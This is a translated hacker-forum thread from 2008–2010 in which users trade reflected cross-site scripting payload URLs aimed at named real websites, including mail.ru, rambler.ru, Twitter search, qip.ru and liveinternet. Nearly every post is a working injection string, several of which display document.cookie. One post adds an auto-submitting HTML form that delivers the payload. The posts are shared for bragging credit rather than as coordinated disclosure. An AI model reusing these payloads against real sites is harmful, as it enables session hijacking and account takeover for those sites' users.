Passive XSS on mail servers

Discussion in 'Mail Service Vulnerabilities' started by Constantine, 25 Oct 2008.

  1. Mil-Net

    Mail.ru

    http://voip.agent.mail.ru/cgi-bin/mailrubin.dll/cards.html?inf="><script>alert('BY HACKED Mil-Net')</script>

    Found it myself recently!
    Passing it around :)
     
    3 people like this.
  2. Mil-Net

    Rambler.ru

    http://planeta.rambler.ru/community/icq/?tags=68773422%22%3E%3Cscript%3Ealert(%27BY HACKED Mil-Net%27)%3C/script%3E%3Cnoscript%3E
     
    1 person likes this.
  3. brain[pillow]

    Twitter isn't a mail service, but I hope I won't get beaten up for it:

    http://search.twitter.com/search?q=%26%2339%3B)%3Balert(%26%2339%3Bxek%26%2339%3B)%3B%2F%2F

    Then click "Tweet the results" on the right.
     
    1 person likes this.
  4. Mil-Net

    Well then, I'll post mine too, since I couldn't find a suitable thread!
    A software store!

    http://soft.qwerty.ru/search/index.php?q=%22%3E%3Cscript%3Ealert%28%27BY+HACKED+Mil-Net%27%29%3C%2Fscript%3E&s=%CD%E0%E9%F2%E8
     
    1 person likes this.
  5. <Cyber-punk>

    Mail? Mail!
    http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
     
    1 person likes this.
  6. vitaliy_n73

    http://autorambler.ru/journal/testdrives/?brand=%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E
     
    3 people like this.
  7. vitaliy_n73

    http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E
     
    2 people like this.
  8. vitaliy_n73

    http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1&period=day%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E
     
    2 people like this.
  9. W@r.N0i$e

    Passive XSS on mail.ru
    Code:
    https://auth.mail.ru/cgi-bin/auth?page=&post=&login_from=&Login="><SCRIPT>alert("XSS")<%2FSCRIPT>">&Domain=mail.ru&Password=yyy
     
    #89 W@r.N0i$e, 9 Jan 2010
    Last edited: 9 Jan 2010
    1 person likes this.
  10. kl0yn

    Repost!

    http://forum.antichat.ru/showpost.php?p=1645042&postcount=86
     
  11. gringo60

    Works for logged-in users.

    http://11x11.mail.ru/users/10000125/'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
  12. mikail

    http://afisha.rambler.ru/message.html?id=33028434&pg=%22%3E%3Cscript%3Ealert%28%27mikail%27%29%3C/script%3E
     
    2 people like this.
  13. gringo60

    http://file.qip.ru/preview.jsp?w=200%27&h=200%27&s=no&b=yes&l=javascript:alert(document.cookie);
     
    2 people like this.
  14. Uex Urgent

    http://mail.am

    http://m.mail.am/mail/util.php?func=info&sort_subject='"><script>alert();</script>


    http://mirtesen.ru
    http://mirtesen.ru/people/map?city=&igp=#search&<img src=s onerror=alert(document.cookie)>&&
     
    #94 Uex Urgent, 25 Apr 2010
    Last edited: 3 May 2010
    4 people like this.
  15. Konqi

    http://www.everyday.com

    http://www.register.everyday.com/reg_step.phtml?REG_TEXT_FIRST_NAME="><script>alert('0_o')</script>
     
  16. !!!SpartakFan!!!

    http://list.ngs.ru/page.php?do='search&bool=and&substring=0&mh=10&query="><script>alert(document.cookie)</script>
     
    2 people like this.
  17. Meecript_

    Quite interesting indeed :)
    Especially in this form:
     
  18. Ruslan1817

    Code:
    http://forum2.km.ru/keyboard.aspx?id=</script><script>alert(document.cookie)</script>
    Code:
    http://vkrugudruzei.ru/search/interest.asp?iname=%F2%E0%ED%F6%FB&igroup=&iequal=1>"><script>alert(document.cookie)</script>
     
    #98 Ruslan1817, 20 May 2010
    Last edited: 20 May 2010
    1 person likes this.
  19. life_glider

    liveinternet
    PHP:
    <body onload="document.UsrSrchImportFormSrch.submit();">
    <form id="UsrSrchImportFormSrch" action="http://www.liveinternet.ru/importmail.php?cmd=getbook_icq" method="post" name="UsrSrchImportFormSrch" onKeyDown="checkKey('UsrSrchImportFormSrch');">
        <input class="SrvBorderBlue" type="text" name="addicqs" value='"><script>alert(/Found by life_glider/);</script> <br "' />
        <input class="Hi" type="submit" value="Искать!" />
    </form>
    </body>
     
    #99 life_glider, 23 May 2010
    Last edited: 24 May 2010
    1 person likes this.
  20. BlackFan

    http://maps.mail.ru

    In the search box:
    Code:
    ' onMouseOver='alert(1)'>
    and click "Find"



    kards.qip.ru
    In any comments, paste into login/pass:
    Code:
    "><img src='.' onerror='alert()'>
    And click "Add comment"
     
    #100 BlackFan, 11 Jun 2010
    Last edited: 14 Jun 2010
    3 people like this.